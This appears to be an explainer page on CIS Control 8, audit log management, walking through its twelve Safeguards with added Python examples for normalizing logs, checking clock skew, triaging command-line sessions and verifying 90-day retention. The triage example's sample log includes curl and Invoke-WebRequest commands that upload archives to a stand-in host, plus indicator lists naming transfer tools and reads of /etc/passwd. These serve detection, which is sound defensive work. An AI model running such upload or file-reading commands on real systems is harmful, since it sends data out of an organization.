Audit logs provide a rich source of data critical to preventing, detecting, understanding, and minimizing the impact of network or data compromise in a timely manner. Collecting logs and reviewing them regularly is useful for identifying baselines, establishing operational trends, and detecting abnormalities. In some cases, logging may be the only evidence of a successful attack. CIS Control 8 emphasizes the need for centralized collection and storage, and for standardization, to better coordinate audit log reviews. Some industries have regulatory bodies that require the collection, retention, and review of logs, so CIS Control 8 is not only important but in some cases also mandatory.
The Control is composed of 12 Safeguards, mostly in the IG2 category, with Protect or Detect security functions that all organizations with enterprise assets should implement. Audit logs should capture detailed information about (1) what event happened, (2) what system the event happened on, (3) what time the event happened, and (4) who caused the event to happen. Alerts should be set for suspicious or major events, such as when users attempt to access resources without appropriate privileges, or the execution of binaries that should not be on a system.
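The four fields above and the two alert conditions can be turned into a small review routine. The following is an added example, not code from CIS or from this page: it parses constructed audit records in an assumed key=value format, maps each onto what/where/when/who, rejects records that lack any of the four, and raises alerts for privilege failures and for execution of binaries outside an assumed allowlist.

```python
"""Normalize constructed audit-log lines into the four fields CIS Control 8
calls for (what, where, when, who) and raise alerts for two event classes:
privilege failures and execution of unexpected binaries.

Added example. The key=value line format, the sample records and the
allowlist are assumptions, not a real product's format."""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Optional

# Constructed sample records (assumption: one key=value token per field).
SAMPLE_LOG = """\
ts=2024-03-01T08:15:02Z host=web01 user=alice action=login result=success
ts=2024-03-01T08:16:10Z host=web01 user=alice action=read object=/srv/app/config result=success
ts=2024-03-01T08:17:45Z host=db02 user=bob action=read object=/etc/shadow result=denied reason=EACCES
ts=2024-03-01T08:18:03Z host=db02 user=bob action=exec object=/tmp/updater result=success
ts=2024-03-01T08:19:30Z host=web01 user=svc-backup action=exec object=/usr/bin/rsync result=success
ts=2024-03-01T08:20:00Z host=web01 user=carol action=read object=/var/log/secure result=denied reason=EACCES
"""

# Binaries whose execution is expected on these hosts (assumption).
EXEC_ALLOWLIST = {"/usr/bin/rsync", "/usr/bin/python3", "/bin/sh"}


@dataclass
class AuditEvent:
    what: str           # (1) what happened: action plus object
    where: str          # (2) which system it happened on
    when: datetime      # (3) when, as a timezone-aware UTC timestamp
    who: str            # (4) who caused it
    result: str
    obj: Optional[str]
    raw: str


def parse_line(line: str) -> AuditEvent:
    """Split key=value tokens and map them onto the four required fields.
    Raises ValueError when any of the four is missing, so incomplete
    records are surfaced rather than silently dropped."""
    fields = dict(tok.split("=", 1) for tok in line.split() if "=" in tok)
    missing = [k for k in ("ts", "host", "user", "action") if k not in fields]
    if missing:
        raise ValueError(f"audit record missing {missing}: {line!r}")
    when = datetime.fromisoformat(fields["ts"].replace("Z", "+00:00")).astimezone(timezone.utc)
    obj = fields.get("object")
    what = fields["action"] if obj is None else f"{fields['action']} {obj}"
    return AuditEvent(what=what, where=fields["host"], when=when,
                      who=fields["user"], result=fields.get("result", "unknown"),
                      obj=obj, raw=line)


def alerts_for(event: AuditEvent) -> List[str]:
    """Return alert strings for the two conditions named on the page."""
    found = []
    if event.result == "denied":
        found.append(f"PRIVILEGE: {event.who} denied {event.what} on {event.where}")
    if event.what.startswith("exec ") and event.obj not in EXEC_ALLOWLIST:
        found.append(f"UNEXPECTED_BINARY: {event.who} ran {event.obj} on {event.where}")
    return found


def review(log_text: str) -> List[str]:
    """Parse every non-empty line and collect alerts in log order."""
    out: List[str] = []
    for line in log_text.splitlines():
        if line.strip():
            out.extend(alerts_for(parse_line(line)))
    return out


if __name__ == "__main__":
    for alert in review(SAMPLE_LOG):
        print(alert)
```

Running it over the constructed records yields three alerts: two privilege denials and one execution from `/tmp`. The strict parser is deliberate: a record that cannot answer who did what, where and when is of little forensic value, and failing loudly on it is how you learn that a source is not configured to the standard the log management process requires.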
Audit logs are also a target for attackers looking to cover their tracks. So, audit logging must be configured to enforce access control and limit the users who can modify or delete logging data.
The CIS Benchmarks, which are available for many product families, are best-practice security configuration guides that are mapped to the Controls and walk you through configuration remediation step-by-step.
Key Takeaways for Control 8
An audit log management program should at least implement processes to:
- Ensure that detailed, time-synchronized audit logs are collected across enterprise assets.
- Ensure that logs are stored in a centralized location and retained for a minimum of 90 days.
- Ensure audit log reviews are conducted on a weekly basis, or more often, to establish baselines and detect potential threats.
Safeguards for Control 8
1. Establish and Maintain an Audit Log Management Process
Description: Establish and maintain an audit log management process that defines the enterprise's logging requirements. At a minimum, address the collection, review, and retention of audit logs for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
Notes: This IG1 Safeguard intends to protect enterprise assets by ensuring that audit logs are collected, reviewed, and maintained in a systematic and repeatable manner. Audit logs need to be complete and accurate. It may be necessary to schedule simulations of events to verify that the desired logs are generated. Tools may be required to ingest and search logs. Log data may need to be normalized to enable quick and efficient analysis.
2. Collect Audit Logs
Description: Collect audit logs. Ensure that logging, per the enterprise's audit log management process, has been enabled across enterprise assets.
Notes: This IG1 Safeguard intends to support detection of threats against enterprise assets. It is basic cyber hygiene and should be implemented by all enterprises.
3. Ensure Adequate Audit Log Storage
Description: Ensure that logging destinations maintain adequate storage to comply with the enterprise's audit log management process.
Notes: This IG1 Safeguard supports protection of enterprise assets and retention of log history, ensuring that logging audit or compliance requirements are met.
4. Standardize Time Synchronization
Description: Standardize time synchronization. Configure at least two synchronized time sources across enterprise assets, where supported.
Notes: This IG2 Safeguard supports correlation of logging data by synchronizing timestamps.
5. Collect Detailed Audit Logs
Description: Configure detailed audit logging for enterprise assets containing sensitive data. Include event source, date, username, timestamp, source addresses, destination addresses, and other useful elements that could assist in a forensic investigation.
Notes: This IG2 Safeguard intends to support detection of abnormalities and data compromise by ensuring verbose logs are collected, which allow us to reconstruct what happened during an event and to establish the extent of affected assets.
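Safeguards 4 and 5 are easiest to verify together: logs can only be correlated if host clocks agree, and they can only support a forensic reconstruction if the detailed fields are actually present. The following is an added example, not code from CIS or from this page. It assumes a key=value record format in which the collector stamps each line with a `received` time of its own (an assumption about the pipeline, not something the page states); the difference between the host's `ts` and `received`, taken as a per-host median, exposes hosts whose clocks have drifted, and a second pass reports which of the Safeguard 5 fields each record lacks.

```python
"""Two checks a reviewer runs before trusting logs for correlation:
(a) clock skew per host, from the gap between the timestamp the host wrote
    and the time the central collector received the line, and
(b) completeness of the detailed fields Safeguard 5 lists.

Added example. The key=value format, the 'received' field stamped by the
collector, the sample records and the tolerance are all assumptions."""
from datetime import datetime, timezone
from statistics import median
from typing import Dict, List

# Constructed samples: ts = host clock, received = collector clock (assumption).
SAMPLE_LOG = """\
source=sshd ts=2024-03-01T09:00:00Z received=2024-03-01T09:00:01Z host=web01 user=alice src=10.0.0.5 dst=10.0.1.10 action=login
source=sshd ts=2024-03-01T09:05:00Z received=2024-03-01T09:05:01Z host=web01 user=alice src=10.0.0.5 dst=10.0.1.10 action=logout
source=sshd ts=2024-03-01T08:52:10Z received=2024-03-01T09:02:11Z host=db02 user=bob src=10.0.0.7 dst=10.0.1.20 action=login
source=sshd ts=2024-03-01T08:55:40Z received=2024-03-01T09:05:41Z host=db02 user=bob src=10.0.0.7 dst=10.0.1.20 action=logout
source=app ts=2024-03-01T09:03:00Z received=2024-03-01T09:03:00Z host=app03 user=svc action=query
"""

# Field names standing in for the Safeguard 5 elements (assumed key names):
# event source, timestamp (carries the date), system, username, source and
# destination addresses.
REQUIRED = ("source", "ts", "host", "user", "src", "dst")
MAX_SKEW_SECONDS = 60.0  # tolerance before a host is reported; assumption


def _parse(line: str) -> Dict[str, str]:
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def _utc(stamp: str) -> datetime:
    return datetime.fromisoformat(stamp.replace("Z", "+00:00")).astimezone(timezone.utc)


def clock_skew_by_host(log_text: str) -> Dict[str, float]:
    """Median (host clock - collector clock) in seconds per host. A large
    negative value means the host's clock runs behind the collector; the
    median ignores ordinary transport delay of a second or two."""
    deltas: Dict[str, List[float]] = {}
    for line in log_text.splitlines():
        f = _parse(line)
        if "ts" in f and "received" in f and "host" in f:
            d = (_utc(f["ts"]) - _utc(f["received"])).total_seconds()
            deltas.setdefault(f["host"], []).append(d)
    return {h: median(v) for h, v in deltas.items()}


def hosts_out_of_sync(log_text: str, tolerance: float = MAX_SKEW_SECONDS) -> List[str]:
    """Hosts whose median skew exceeds the tolerance; their timestamps cannot
    be lined up against other sources until the clock is fixed."""
    return sorted(h for h, s in clock_skew_by_host(log_text).items() if abs(s) > tolerance)


def missing_fields(log_text: str) -> Dict[int, List[str]]:
    """Map 1-based line number -> Safeguard 5 fields absent from that record."""
    report: Dict[int, List[str]] = {}
    for n, line in enumerate(log_text.splitlines(), start=1):
        f = _parse(line)
        absent = [k for k in REQUIRED if k not in f]
        if absent:
            report[n] = absent
    return report


if __name__ == "__main__":
    print("skew by host:", clock_skew_by_host(SAMPLE_LOG))
    print("out of sync:", hosts_out_of_sync(SAMPLE_LOG))
    print("missing fields:", missing_fields(SAMPLE_LOG))
```

On the constructed records `db02` is reported as roughly ten minutes behind the collector, so a login it logged at 08:52 actually happened around 09:02; without the check, a reviewer correlating it with firewall logs would be looking in the wrong ten-minute window. The `app` source on line 5 is reported for lacking source and destination addresses, which is the kind of gap the event simulations mentioned under Safeguard 1 are meant to catch.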
6. Collect DNS Query Audit Logs
Description: Collect DNS query audit logs on enterprise assets, where appropriate and supported.
Notes: DNS query logs can help track down misconfigured hosts, or signs and the source of an intrusion or attack.
7. Collect URL Request Audit Logs
Description: Collect URL request audit logs on enterprise assets, where appropriate and supported.
Notes: This IG2 Safeguard intends to detect threats and anomalous events relating to URL requests.
8. Collect Command-Line Audit Logs
Description: Collect command-line audit logs. Example implementations include collecting logs from PowerShell, BASH, and remote administrative terminals.
Notes: This IG2 Safeguard intends to detect unusual or threatening behavior at command consoles. Attackers may use a common set of commands from reconnaissance to exfiltration or impact.
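The point of collecting command-line logs is to review them for the pattern the note describes: a run of discovery commands followed by a transfer tool in the same session. The following is an added example, not code from CIS or from this page. The record format (pipe-separated, with a session id), the indicator lists and the window are assumptions; every command on the lists is something an administrator runs legitimately, so the output is a triage list for the weekly review, not a verdict.

```python
"""Review constructed command-line audit records (bash and PowerShell) and
flag sessions in which discovery commands are followed by an outbound
transfer tool inside a short window.

Added example. The record format, session ids, indicator lists and the
thresholds are assumptions, not anything the page specifies."""
from collections import defaultdict
from datetime import datetime, timezone, timedelta
from typing import Dict, List, Tuple

# Constructed records: ts | host | user | session | shell | command line.
SAMPLE_LOG = """\
2024-03-01T10:00:05Z|web01|alice|s1|bash|ls -la /srv/app
2024-03-01T10:00:20Z|web01|alice|s1|bash|tail -n 50 /var/log/app.log
2024-03-01T10:01:00Z|db02|bob|s2|bash|whoami
2024-03-01T10:01:08Z|db02|bob|s2|bash|id
2024-03-01T10:01:30Z|db02|bob|s2|bash|cat /etc/passwd
2024-03-01T10:03:10Z|db02|bob|s2|bash|curl -T /tmp/archive.tgz http://203.0.113.9/up
2024-03-01T10:10:00Z|win05|carol|s3|powershell|Get-Process
2024-03-01T10:40:00Z|win05|carol|s3|powershell|Get-ChildItem C:\\Users
2024-03-01T11:00:00Z|win05|carol|s3|powershell|Invoke-WebRequest -Uri http://203.0.113.9/up -Method Post -InFile C:\\tmp\\a.zip
"""

# Indicator lists (assumption). Each entry is a normal admin command; the
# signal is several of them together, in one session, inside the window.
DISCOVERY = {"whoami", "id", "cat /etc/passwd", "net user", "ipconfig",
             "systeminfo", "Get-Process", "Get-ChildItem"}
TRANSFER = {"curl", "wget", "scp", "certutil", "Invoke-WebRequest"}
WINDOW_SECONDS = 15 * 60   # discovery-to-transfer window; assumption
MIN_DISCOVERY = 2          # discovery commands needed before a transfer counts


def _classify(cmd: str) -> str:
    """Return 'discovery', 'transfer' or 'other' for one command line,
    matching either the whole line or its first word."""
    stripped = cmd.strip()
    head = stripped.split()[0] if stripped else ""
    if stripped in DISCOVERY or head in DISCOVERY:
        return "discovery"
    if head in TRANSFER:
        return "transfer"
    return "other"


def _sessions(log_text: str) -> Dict[str, List[Tuple[datetime, str]]]:
    """Group (timestamp, class) pairs by session id, in time order."""
    by_session: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, _host, _user, sid, _shell, cmd = line.split("|", 5)
        when = datetime.fromisoformat(ts.replace("Z", "+00:00")).astimezone(timezone.utc)
        by_session[sid].append((when, _classify(cmd)))
    for events in by_session.values():
        events.sort()
    return by_session


def flagged_sessions(log_text: str, window_seconds: int = WINDOW_SECONDS) -> List[str]:
    """Session ids where at least MIN_DISCOVERY discovery commands and a
    transfer command all fall within window_seconds of some discovery command."""
    window = timedelta(seconds=window_seconds)
    hits = []
    for sid, events in _sessions(log_text).items():
        for i, (t0, kind) in enumerate(events):
            if kind != "discovery":
                continue
            in_window = [k for t, k in events[i:] if t - t0 <= window]
            if in_window.count("discovery") >= MIN_DISCOVERY and "transfer" in in_window:
                hits.append(sid)
                break
    return sorted(hits)


if __name__ == "__main__":
    print("sessions to triage:", flagged_sessions(SAMPLE_LOG))
```

With the default 15-minute window only session `s2` is flagged; `s3` shows the same sequence spread over 50 minutes and is missed, which is the usual trade-off with time-windowed rules. Widening the window to an hour flags both, at the cost of more legitimate administrative sessions landing on the review list.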
9. Centralize Audit Logs
Description: Centralize, to the extent possible, audit log collection and retention across enterprise assets.
Notes: This IG2 Safeguard intends to support other Control Safeguards within organizations that have increased operational complexity. Centralizing audit logs will make collection, retention, and review simpler. Tools exist to ingest, normalize, and parse logs for efficient searching and analysis.
10. Retain Audit Logs
Description: Retain audit logs across enterprise assets for a minimum of 90 days.
Notes: This IG2 Safeguard intends to protect enterprise assets by requiring that real-time log data be retained for a period of time to satisfy audit or compliance needs.
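Safeguard 10 is usually checked by asking "do we keep 90 days?", but the question that matters in an investigation is whether the last 90 days are covered without holes for every asset, and (Safeguard 3) whether the destination can keep doing so. The following is an added example, not code from CIS or from this page; the archive inventory, the reference date and the capacity figures are constructed.

```python
"""Check that retained audit logs cover the 90-day minimum without gaps for
each host, and estimate whether the log destination has room to keep doing
so (Safeguards 3 and 10).

Added example. The inventory format, the reference date and the capacity
numbers are constructed, not taken from any real environment."""
from datetime import date, timedelta
from typing import Dict, List, Tuple

RETENTION_DAYS = 90                 # the page's minimum
TODAY = date(2024, 3, 1)            # reference date for the check (constructed)

DateRange = Tuple[date, date]

# Constructed inventory: host -> (first day, last day) of each archive file.
INVENTORY: Dict[str, List[DateRange]] = {
    "web01": [(date(2023, 11, 1), date(2023, 12, 31)),
              (date(2024, 1, 1), date(2024, 3, 1))],
    "db02":  [(date(2023, 12, 1), date(2024, 1, 15)),
              (date(2024, 1, 20), date(2024, 3, 1))],   # four-day hole in January
    "app03": [(date(2024, 2, 10), date(2024, 3, 1))],   # logging started too recently
}


def retention_gaps(archives: List[DateRange], today: date,
                   days: int = RETENTION_DAYS) -> List[DateRange]:
    """Return the uncovered (start, end) date ranges inside the last `days`
    days ending at `today`. An empty list means the window is fully covered."""
    window_start = today - timedelta(days=days - 1)
    # Clip each archive to the window and drop the ones entirely outside it.
    covered = [(max(a, window_start), min(b, today))
               for a, b in sorted(archives) if b >= window_start and a <= today]
    gaps: List[DateRange] = []
    cursor = window_start                      # first day not yet known to be covered
    for a, b in covered:
        if a > cursor:
            gaps.append((cursor, a - timedelta(days=1)))
        cursor = max(cursor, b + timedelta(days=1))
    if cursor <= today:
        gaps.append((cursor, today))
    return gaps


def noncompliant_hosts(inventory: Dict[str, List[DateRange]],
                       today: date) -> Dict[str, List[DateRange]]:
    """Hosts that fail the retention check, with their gaps."""
    return {h: g for h, a in inventory.items() if (g := retention_gaps(a, today))}


def days_of_headroom(capacity_gb: float, used_gb: float, daily_ingest_gb: float) -> float:
    """Days until the destination fills at the current ingest rate; if this is
    below RETENTION_DAYS the storage requirement of Safeguard 3 is not met."""
    if daily_ingest_gb <= 0:
        raise ValueError("daily ingest must be positive")
    return max(0.0, capacity_gb - used_gb) / daily_ingest_gb


if __name__ == "__main__":
    for host, gaps in noncompliant_hosts(INVENTORY, TODAY).items():
        print(host, [(a.isoformat(), b.isoformat()) for a, b in gaps])
    print("days of headroom:", days_of_headroom(capacity_gb=2000, used_gb=1400, daily_ingest_gb=8))
```

On the constructed inventory `web01` passes, `db02` is reported for the four missing days in January even though its oldest archive is older than 90 days, and `app03` fails because collection only started in February. The headroom figure (75 days at the constructed rates) is the companion check: a destination that will fill before the retention period elapses satisfies Safeguard 10 today and not next quarter.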
11. Conduct Audit Log Reviews
Description: Conduct reviews of audit logs to detect anomalies or abnormal events that could indicate a potential threat. Conduct reviews on a weekly, or more frequent, basis.
Notes: It is not enough to just collect audit logs. This IG2 Safeguard intends to detect anomalous behavior through periodic log review.
12. Collect Service Provider Logs
Description: Collect service provider logs, where supported. Example implementations include collecting authentication and authorization events, data creation and disposal events, and user management events.
Notes: This IG3 Safeguard supports detection of threats and anomalous events relating to service providers.
See how simple and effective security controls can create a framework that helps you protect your organization and data from known cyber-attack vectors by downloading the CIS Controls guide here.
Read more about the 18 CIS Controls here:
CIS Control 08: Audit Log Management